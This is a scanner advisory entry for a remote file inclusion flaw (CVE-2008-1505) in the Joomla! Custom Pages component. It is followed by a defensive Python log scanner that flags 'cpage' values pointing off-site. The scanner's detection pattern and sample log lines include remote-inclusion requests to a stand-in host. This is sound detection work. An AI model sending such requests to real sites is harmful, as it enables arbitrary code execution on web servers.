VID | 210110 |
Severity | 40 |
Port | 80, ... |
Protocol | TCP |
Class | CGI |
Detailed Description |
The Custom Pages component for Joomla! is vulnerable to remote file inclusion via the 'cpage' parameter. Joomla! is an open-source content management system written in PHP, and Custom Pages is a third-party module for Joomla!. Custom Pages component version 1.1 and earlier versions are affected because of input validation errors in the 'custompages.php' script when it processes the 'cpage' parameter. By sending a specially crafted URL request to the 'index.php' script using the 'cpage' parameter, a remote attacker could execute arbitrary PHP code with the privileges of the web server, regardless of PHP's 'register_globals' setting.
* References: http://www.milw0rm.com/exploits/5294, http://secunia.com/advisories/29520
* Platforms Affected: Simple Rapid Addon Dev, Custompages component for Joomla! version 1.1 and earlier versions; any operating system, any version |
Recommendation |
No upgrade or patch available as of June 2014.
Upgrade to a fixed version of the Custompages component when one becomes available from the Joomla! Extensions Directory website at http://extensions.joomla.org/component/option,com_mtree/task,viewlink/link_id,1125/Itemid,35/ |
Related URL | CVE-2008-1505 (CVE) |
Related URL | 28409 (SecurityFocus) |
Related URL | 41396 (ISS) |
|
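A detection check for the request pattern described above, as an added example that is not part of the original advisory: it scans web server access log lines for requests whose 'cpage' value names a remote resource. The combined log format, the sample lines, the hosts and the scheme pattern are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a 'cpage' value that names a remote resource starts with a
# URL scheme ("http://", "ftp://", "php://", ...), "data:" or a
# protocol-relative "//". Local page names such as "about" do not.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//)", re.IGNORECASE)

# Request line inside a combined-format access log entry. Only the query
# string is inspected; POST bodies are not present in access logs.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_cpage(line):
    """Return the decoded 'cpage' value if it points off-site, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    # parse_qs percent-decodes values, so encoded schemes are caught too.
    for value in parse_qs(query, keep_blank_values=True).get("cpage", []):
        if REMOTE_VALUE.match(value):
            return value
    return None


def scan(lines):
    """Return (client address, cpage value) for every flagged log line."""
    hits = []
    for line in lines:
        value = suspicious_cpage(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits


# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2014:10:00:01 +0000] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jun/2014:10:00:05 +0000] "GET /index.php?cpage=http%3A%2F%2Ffiles.example%2Fa.txt HTTP/1.1" 200 311',
    '192.0.2.10 - - [01/Jun/2014:10:00:09 +0000] "GET /index.php?cpage=about HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jun/2014:10:00:12 +0000] "GET /index.php?cpage=FTP://files.example/a HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} requested cpage={value!r}")
```

Because no fixed version is listed, a hit on a site that still has the component installed is worth investigating together with the response status and any outbound connections from the web server at the same time.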